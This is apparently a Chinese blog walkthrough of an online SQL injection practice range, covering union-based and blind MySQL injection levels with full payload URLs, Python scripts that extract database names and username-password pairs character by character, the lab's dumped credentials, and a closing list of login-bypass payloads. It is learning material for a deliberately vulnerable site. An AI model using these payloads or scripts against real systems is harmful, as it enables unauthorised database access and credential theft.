MySQL注入基础练习

最近发现了一个练习SQL注入的靶场,对于基本的注入还是可以的,没有过多的拐弯抹角。但是好像领会错了作者的意思。好吧,不重要,了解注入本质就好。

[TOC]

MySQL注入基础练习

2019-04-11

指尖轻流过

最近发现了一个练习SQL注入的,就看了看,做了几道,后来发现与作者本意不符- -好吧,当做基础练手是够了。

在线SQL靶场:http://leettime.net/sqlninja.com/index.php

这里是从基本注入开始的,以后慢慢使用高级的语法。

PS:看的难受的慌。

显性注入

显性注入01(单引号字符型)

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

注入点确认,and '1'='1正常,and '1'='2错误,注入过程使用and '1'='2'为了显示报错内容

  • 使用order by n-- - 获取字段数

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3-- -

  • 使用1,2,3填充字段,爆出可用字段

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' and '1'='2' union select 1,2,3-- -

  • 数据库名

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=' and '1'='2' union select 1,database(),3-- -

(leettime_761wHole)

  • 使用 系统库information_schema,爆出表名

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=' and '1'='2' union select 1,table_name,3 from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65-- -

(Username is : testtable1
Username is : userlogs
Username is : users)

  • 爆出字段名称

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=' and '1'='2' union select 1,column_name,3 from information_schema.columns where table_name=0x7573657273-- -

Username is : id
Username is : username
Username is : password
Username is : user_type
Username is : sec_code

  • 爆出字段内容

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=' and '1'='2' union select 1,concat(username,0x3D,password),3 from users-- -

Username is : injector=khan
Username is : decompiler=hacktract
Username is : devilhunte=dante
Username is : Zen=sec-idiots
Username is : Zenodermus=security-i
Username is : grayhat=hacker
Username is : khan=haxor
Username is : admin=sadmin

显性注入02(整型数字型)

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1

注入点确认,and 1=1正常,and 1=2错误,注入过程中使用 and 1=2让他显示报错内容

  • 确认字段个数

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 order by 4-- -

  • 确认可用字段

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 and 1=2 union select 1,database(),3,4-- -

  • 爆表

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65-- -

  • 爆字段

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 and 1=2 union select 1,column_name,3,4 from information_schema.columns where table_name=0x7573657273-- -

  • 字段内容

http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1 and 1=2union select 1,concat(username,0x3D,password),3,4 from users-- -

显性注入03(双引号字符型)

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1

注入点确认,and "1"="1正常,and "1"="2错误,注入过程中使用 and "1"="2"让他显示报错内容

  • 匹配字段

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" order by 5-- -

  • 可用字段位置

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and "1"="2" union select 1,2,3,4,5-- -

  • 库名

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and "1"="2" union select 1,database(),3,4,5-- -

  • 表名

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and "1"="2" union select 1,table_name,3,4,5 from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65-- -

  • 字段名

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and "1"="2" union select 1,column_name,3,4,5 from information_schema.columns where table_name=0x7573657273-- -

  • 字段内容

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and "1"="2" union select 1,concat(username,0x3D,password),3,4,5 from users-- -

显性注入04(字符+括号)

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1

注入点确认

使用?id=1'报错use near ''1'')' at line 1,因此去构造?id=1') and 1=2

注入过程省略,可根据 显性注入01

显性注入05(limt限制)

http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1

注入点确认:

后面加单引号?id=1'报错use near '' and id=1' limit 1' at line 1

and 1=1正常,and 1=2错误,证明存在注入,但是limit的存在,每次只能返回一条数据。

  • 爆字段,

...

  • 配合limit爆出表名,逐条

`http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1
and 1=2 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65 limit 2,1-- -`

  • 配合limit爆出字段名称,逐条

`http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1
and 1=2 union select 1,column_name,3,4,5 from information_schema.columns where table_name=0x7573657273 limit 2,1-- -`

  • 配合limit 逐条输出字段内容

`http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1
and 1=2 union select 1,concat(username,0x3D,password),3,4,5 from users limit 1,1-- -`

盲注

盲注01(数字型)

http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1

注入点确认:

and 1=1正常,and 1=2错误,存在注入点;

order by 3-- -,报错order by 3-- -)) and id='1 order by 3-- -' limit 1

PS:题目说是XPATH,但是构造语句半天不行,最后发现是盲注,语句只能是?id=1 and 1=1 and if(xxx,xxx,xxx)

  • 判断数据库的长度,使用>快速判断范围,确认是17

http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1 and 1=1 and if(length(database())>15,sleep(3),1)

  • 挨个字符判断数据库名,名字太长判断的慢

http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1 and 1=1 and ascii(substr(database(),2,1))= 101

import requests

url = 'http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1'
st = 'qwertyuiopasdfghjklzxcvbnm12345678QWERTYUIOPALKJHGFDZXCVBNM90!@#$%^&*()_+/\\":;\'*?><,.~`'
for i in range(1,18):
    for p in st:
        get_url = url + ' and 1=1 and ascii(substr(database(),{0},1))={1}'.format(i,ord(p))
        res = requests.get(get_url)
        if 'this id exists' in res.text:
            print(p)
  • 判断表,先用count判断个数 , ASCII值51对应的字符是3

http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1 and 1=1 and ascii(substr((select count(table_name) from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65),1,1))=51

  • 判断表名长度,使用limit逐个判断

http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1 and 1=1 and length((select table_name from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65 limit 0,1))=10

  • 判断表名

and 1=1 and ascii(substr((select table_name from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65 limit 0,1),1,1))>100

import requests


url = 'http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1'
st = 'qwertyuiopasdfghjklzxcvbnm12345678'
# 表名
for i in range(3):
    if i == 0:
        print('第一个')
    elif i == 1:
        print('第二个')
    else:
        print('第三个')
    for x in range(1,11):
        for p in st:
            get_url = url + ' and 1=1 and  ascii(substr((select table_name from information_schema.tables where table_schema=0x6C65657474696D655F37363177486F6C65 limit {0},1),{1},1))={2}'.format(i,x,ord(p))
            # print(get_url)
            res = requests.get(get_url)
            if 'this id exists' in res.text:
                print(p)
                break
  • 判断字段个数 5个

and 1=1 and ascii(substr((select count(column_name) from information_schema.columns where table_name=0x7573657273),1,1))=53

  • 判断字段长度

and 1=1 and length((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1))=2

  • 判断字段名称

and 1=1 and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1,1))=105

import requests


url = 'http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1'
st = 'qwertyuiopasdfghjklzxcvbnm12345678'
for i in range(3):
    if i == 0:
        print('第一个')
    elif i == 1:
        print('第二个')
    else:
        print('第三个')
    for x in range(1,11): # 长度
        for p in st:
            get_url = url + ' and 1=1 and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit {0},1),{1},1))={2}'.format(i,x,ord(p))
            # print(get_url)
            res = requests.get(get_url)
            if 'this id exists' in res.text:
                print(p)
                break
  • 字段的长度

and 1=1 and length((select concat(username,0x3D,password) from users limit 0,1))=13

  • 字段的值

and 1=1 and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105

import requests


url = 'http://leettime.net/sqlninja.com/tasks/xpath_ch1.php?id=1'
st = 'qwertyuiopasdfghjklzxcvbnm12345678'
for i in range(3):
    if i == 0:
        print('第一个')
    elif i == 1:
        print('第二个')
    else:
        print('第三个')
    for x in range(1,26):  # 字段内容的长度,设置为最大值。
        for p in st:
            get_url = url + ' and 1=1 and ascii(substr((select concat(username,0x3D,password) from users limit {0},1),{1},1))={2}'.format(i,x,ord(p))
            print(get_url)
            res = requests.get(get_url)
            if 'this id exists' in res.text:
                print(p)
                break

盲注02(数字型/括号)

是盲注01的简版

http://leettime.net/sqlninja.com/tasks/xpath_ch2.php?id=1

and 1=1正常,and 1=2错误,存在注入点;

首先输入单引号,报错 use near '') limit 1' at line 1,可以推断 数据库语句where id=(1)

应该这样:

1) and 1=(1) and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

也可以这样:

and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105

盲注03()

http://leettime.net/sqlninja.com/tasks/xpath_ch3.php?id=1

首先输入测试字符'with报错use near '' with and 1' with limit 1' at line 1

猜测语句为:where id=$a and $a limit 1插入数据后为 where id=1 and 1=1 and 1 and 1=1 limit 1

因此,构造语句,执行成功

and 1=1 and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105

或者:

1 and 1=(1) and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

小问题:使用 order by 可以爆出字段,但是无法继续。

http://leettime.net/sqlninja.com/tasks/xpath_ch3.php?id=1 and 1=1 order by 6-- -

盲注04(双引号)

http://leettime.net/sqlninja.com/tasks/xpath_ch4.php?id=1

首先添加字符'正常返回,再测试双引号,返回use near '1"" limit 1' at line 1

利用" and "1"="1正常," and "1"="2错误,确认注入点

可以利用:

?id=1" and 1=1 and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

或者:

?id=1" and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

盲注05()

http://leettime.net/sqlninja.com/tasks/sub_ch1.php?id=1

输入双引号报错use near '") limit 1' at line 1

尝试构造 and ('1')=('1')正常, and ('1')=('2')错误

emmmm......

可用语句:

and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105

?id=1 and ('1')=('1') and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105

盲注06(双引号+括号)

http://leettime.net/sqlninja.com/tasks/sub_ch2.php?id=1

首先输入了双引号",报错use near '"1"") limit 1' at line 1,由此可见?id=("$a")

输入?id=1") and ("1")=("1")-- -正常,?id=1") and ("1")=("2")-- -错误

可用语句:

http://leettime.net/sqlninja.com/tasks/sub_ch2.php?id=1") and ("1")=("1") and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

如果执行如下语句,则报错,爆出了当前用户名和数据库名称:

http://leettime.net/sqlninja.com/tasks/sub_ch2.php?id=1") and scii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

Error While Selection process : execute command denied to user 'tr0ubl3createrha'@'localhost' for routine 'leettime_761wHole.scii'

继续测试:

order by 正常,可用http://leettime.net/sqlninja.com/tasks/sub_ch2.php?id=1") order by 5-- -

然后没了,union select没办法。

盲注06(单引号+括号)

http://leettime.net/sqlninja.com/tasks/sub_ch3.php?id=1

首先,输入单引号报错use near '1'' limit 1' at line 1

继续尝试and 1=1and 1=2,都正常返回;闭合'' and '1'='1正常,' and '1'='2错误

然而如下语句报错:

?id=1' and '1'='1' and scii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

尝试:?id=1' and '1'='1' and scii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105,报错 use near '') and id='1' and '1'='1' and scii(substr((select concat(username,0x3D,password)' at line 1,证明需要括号。

可用语句:

http://leettime.net/sqlninja.com/tasks/sub_ch3.php?id=1') and ('1')=('1') and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

另外一个报错语句:?id=1' and '1'='1' and scii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))='105报错内容:Error While Selection process : execute command denied to user 'tr0ubl3createrha'@'localhost' for routine 'leettime_761wHole.scii'

盲注07(单引号+括号+限定位置)

http://leettime.net/sqlninja.com/tasks/sub_ch4.php?id=1

首先添加字符?id=1'ccc报错use near 'ccc'))a limit 1' at line 1,判定有')'

测试:?id=1') and ('1')=('1正常,?id=1') and ('1')=('2错误,尝试?id=1') and ('1')=('1') and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105,无法成功,报错为use near ''))a limit 1' at line 1,由于没有闭合单引号和括号,因此调换位置。

可用语句:

?id=1') and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105 and ('1')=('1

盲注08(单引号+限定位置)

http://leettime.net/sqlninja.com/tasks/blind_ch1.php?id=1

测试单引号双引号括号等,发现没有什么反应。那就直接用and 1=1,也不行,使用单引号闭合,可以:

' and '1'='1正确,' and '1'='2错误,证明存在。但是' and '1'='1' and xxxx语句执行不成功,即便加上注释也不行。因此调换位置。

可用语句:

http://leettime.net/sqlninja.com/tasks/blind_ch1.php?id=1' and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105 and '1'='1

盲注09(同盲注08)

http://leettime.net/sqlninja.com/tasks/blind_ch2.php?id=1

盲注10(同数字型盲注)

http://leettime.net/sqlninja.com/tasks/blind_ch3.php?id=1

盲注11(双引号+括号)

可用语句:

http://leettime.net/sqlninja.com/tasks/blind_ch4.php?id=1") and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105 and 1=("1

http://leettime.net/sqlninja.com/tasks/blind_ch4.php?id=1") and 1=("1") and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105-- -

盲注12(双引号+括号+限定位置)

http://leettime.net/sqlninja.com/tasks/blind_ch5.php?id=1

可用语句:

http://leettime.net/sqlninja.com/tasks/blind_ch5.php?id=1") and ascii(substr((select concat(username,0x3D,password) from users limit 0,1),1,1))=105 and 1=("1

万能密码

http://leettime.net/sqlninja.com/tasks/login_basic_ch1.php

') or true--
') or ('')=('
') or 1--
') or ('x')=('
" or true--
" or ""="
" or 1--
" or "x"="
") or true--
") or ("")=("
") or 1--
") or ("x")=("
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"

所有原创文章采用 知识共享署名-非商业性使用 4.0 国际许可协议 进行许可。
您可以自由的转载和修改,但请务必注明文章来源并且不可用于商业目的。
本站部分内容收集于互联网,如果有侵权内容、不妥之处,请联系我们删除。敬请谅解!

评论已关闭

很多东西宁缺毋滥,流星的光芒短暂而灼热闪耀。

让你变得更好的那个人,往往是你觉得很难与之相处的那个人。—— by 小宇

觉得自己做的到和不做的到,其实只在一念之间。

路在自己脚下,没有人可以决定我的方向。

你的选择是做或不做,但不做就永远不会有机会。

凡事顺其自然,遇事处于泰然,得意之时淡然,失意之时坦然,艰辛曲折必然,历尽沧桑悟然。